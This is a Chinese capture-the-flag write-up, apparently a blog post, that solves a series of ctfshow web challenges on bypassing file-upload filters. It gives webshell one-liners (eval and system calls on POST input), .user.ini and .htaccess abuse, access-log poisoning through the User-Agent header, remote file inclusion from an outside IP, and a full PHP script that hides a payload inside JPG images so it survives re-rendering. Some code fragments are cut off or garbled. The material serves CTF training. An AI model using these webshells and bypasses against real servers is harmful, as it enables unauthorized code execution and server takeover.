Web 151
查看源码可以发现只能上传png
图片
修改为php
写一个php文件上传一句话木马
可以发现已经成功上传
查看上级目录发现可疑文件
查看flag.php文件内容得出flag
得到flag
Web 152
考点:绕过前端校验
解题思路:
经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。那就抓包一下。
将Content-Type
内容修改成image/png
,重发,发现成功上传
剩下的步骤与151相同查看上级目录,发现flag.php,查看flag.php内容得到flag
Web 153
考点:文件后缀名,黑名单
利用上传user.ini进行文件上传绕过
解题过程:
上传一个含木马的图片
auto_append_file=“xxx”
xxx为我们上传的文件名
。
这样就在每个php文件
上包含了我们的木马文件。
查看/upload目录下是否上传成功,木马上传成功
得到flag
Web 154-155
考点:文件内容过滤,过滤关键字是php
上传一个图片木马,发现上传不了,经过一系列的尝试发现是对文件内容作了些过滤,过滤了php,所以采用简短的语句进行绕过
这一步和上题相似
发现已经上传成功
得到flag
Web 156-158
在前面的基础上过滤了[]
那我们直接用{}
来代替
=eval($_POST{1});?>
或者那就直接输出flag算了,不搞一句话了。摊牌了,反正知道flag位置
=system('tac ../f*')?>
Web159
过滤了括号,那就用反引号就可以啦
=`tac ../f*`?>
Web 160
解题思路:日志包含
过滤关键字是log
所以用拼接绕过
上传完.user.ini
和图片后
访问网站然后修改ua
头信息
web161
上传ini文件时加上GIF89A
在160的基础上增加图片头即可,即 GIF89A
然后用日志包含
web162
过滤了.
,所以不能利用日志包含了,先正常上传.user.ini
远程文件包含
因为不能有.所以将IP转换为十进制,我的默认路由就是一句话木马
如果是包含远程服务器上的PHP文件,那么得到的是被远程服务器解析过的PHP,所以在写一句话木马的时候就不要做成.php的文件,一般包含.txt的文件
=include"http://3024726958"?>
web163
同上用远程文件包含
GIF89a?auto_append_file=http://6024326456
web164
考点: png二次渲染
利用下方代码进行png二次渲染绕过
木马内容
$_GET[0]($_POST[1]);?>
imagepng($img,'1.png');
要修改的图片的路径,1.png是使用的文件,可以不存在
会在目录下自动创建一个1.png
图片
图片脚本内容:
$_GET[0]($_POST[1]);
使用方法:
例子:查看图片,get传入0=system
;post传入tac flag.php
注:
运行上面的代码需要有php的gd库
下面的代码可以检测是否有gd库的存在
$value)echo "$cate: $value";}elseecho '没有安装gd扩展';?>
如没有
把你PHP目录下的ext文件夹里的php_gd.dll复制到系统目录下(C:\Windows\System32),然后修改你的php.ini文件,找到以下位置
;extension=php_gd.dll
把前面的;去掉
如php.ini中没有extension=php_gd.dll,自行添加即可
将生成的图片上传,bp抓包
web165
参考大佬解法
运用以下脚本进行jpg二次渲染
绕过
';if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) { die('php-gd is not installed');}if(!isset($argv[1])) { die('php jpg_payload.php ');}set_error_handler("custom_error_handler");for($pad = 0; $pad < 1024; $pad++) { $nullbytePayloadSize = $pad; $dis = new DataInputStream($argv[1]); $outStream = file_get_contents($argv[1]); $extraBytes = 0; $correctImage = TRUE; if($dis->readShort() != 0xFFD8) { die('Incorrect SOI marker'); } while((!$dis->eof()) && ($dis->readByte() == 0xFF)) { $marker = $dis->readByte(); $size = $dis->readShort() - 2; $dis->skip($size); if($marker === 0xDA) { $startPos = $dis->seek(); $outStreamTmp = substr($outStream, 0, $startPos) . $miniPayload . str_repeat("\0",$nullbytePayloadSize) . substr($outStream, $startPos); checkImage('_'.$argv[1], $outStreamTmp, TRUE); if($extraBytes !== 0) { while((!$dis->eof())) { if($dis->readByte() === 0xFF) { if($dis->readByte !== 0x00) {break; } } } $stopPos = $dis->seek() - 2; $imageStreamSize = $stopPos - $startPos; $outStream = substr($outStream, 0, $startPos) . $miniPayload . substr( str_repeat("\0",$nullbytePayloadSize). substr($outStream, $startPos, $imageStreamSize), 0, $nullbytePayloadSize+$imageStreamSize-$extraBytes) . substr($outStream, $stopPos); } elseif($correctImage) { $outStream = $outStreamTmp; } else { break; } if(checkImage('payload_'.$argv[1], $outStream)) { die('Success!'); } else { break; } } }}unlink('payload_'.$argv[1]);die('Something\'s wrong');function checkImage($filename, $data, $unlink = FALSE) { global $correctImage; file_put_contents($filename, $data); $correctImage = TRUE; imagecreatefromjpeg($filename); if($unlink) unlink($filename); return $correctImage;}function custom_error_handler($errno, $errstr, $errfile, $errline) { global $extraBytes, $correctImage; $correctImage = FALSE; if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) { if(isset($m[1])) { $extraBytes = (int)$m[1]; } }}class DataInputStream { private $binData; private $order; private $size; public function __construct($filename, $order = false, $fromString = false) { $this->binData = ''; $this->order = $order; if(!$fromString) { if(!file_exists($filename) || !is_file($filename)) die('File not exists ['.$filename.']'); $this->binData = file_get_contents($filename); } else { $this->binData = $filename; } $this->size = strlen($this->binData); } public function seek() { return ($this->size - strlen($this->binData)); } public function skip($skip) { $this->binData = substr($this->binData, $skip); } public function readByte() { if($this->eof()) { die('End Of File'); } $byte = substr($this->binData, 0, 1); $this->binData = substr($this->binData, 1); return ord($byte); } public function readShort() { if(strlen($this->binData) < 2) { die('End Of File'); } $short = substr($this->binData, 0, 2); $this->binData = substr($this->binData, 2); if($this->order) { $short = (ord($short[1]) << 8) + ord($short[0]); } else { $short = (ord($short[0]) << 8) + ord($short[1]); } return $short; } public function eof() { return !$this->binData||(strlen($this->binData) === 0); }}?>
先上传一张jpg图片然后下载到本地重命名为2.jpg,再用jpg脚本生成payload_2.jpg
在这里插入图片描述
a为文件名
php jpg二次渲染.php a.jpg
在上传payload_2.jpg,抓包
注:
jpg脚本需在linux环境下运行,我的系统为ubuntu
安装php
sudo apt-get install php
发现报错,需要重新寻找更新源
解决方法如下:
sudo vim sources.listdeb http://mirrors.aliyun.com/ubuntu/ raring main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ raring-security main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ raring-updates main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ raring-proposed main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ raring main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ raring-security main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ raring-updates main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ raring-proposed main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ raring-backports main restricted universe multiverse sudo apt-get updatesudo apt-get install phpjpg脚本需要php-gd库,下面为下载流程sudo apt-cache search php-gd(查询需要的php-gd版本)sudo apt-get install php7.4-gdsudo php -m(查看gd是否安装成功)
web166
前端要求上传zip格式,我们可以直接包含一句话
修改Content-Type为application/x-zip-compressed
web167
题目提示httpd 利用.htaccess
进行绕过
AddType application/x-httpd-php .png //将.png后缀的文件解析 成php
接着上传图片包含一句话
蚁剑连接得flag。
web168
基础免杀
上传png抓包,修改文件格式为php,在文件后面执行命令
发现flag在上层目录里,直接rce
web169
考点:免杀,主要是过滤了php, <>等
创建index.php
文件,因为日志
文件内容将会在index.php中显现
在UA
中加入一句话木马
phpinfo()
可作为瞄点
得到flag
web170
先上传一个zip,然后抓包,改Content-Type
为image/png
,可以传php等格式,但是发现文件内容过滤了 <> php $
发现可以上传 .user.ini
文件
GIF89Aauto_append_file="/var/log/nginx/access.log"
UA添加小马
蚁剑相连
得到flag
来源地址:https://blog.csdn.net/whisper921/article/details/125019061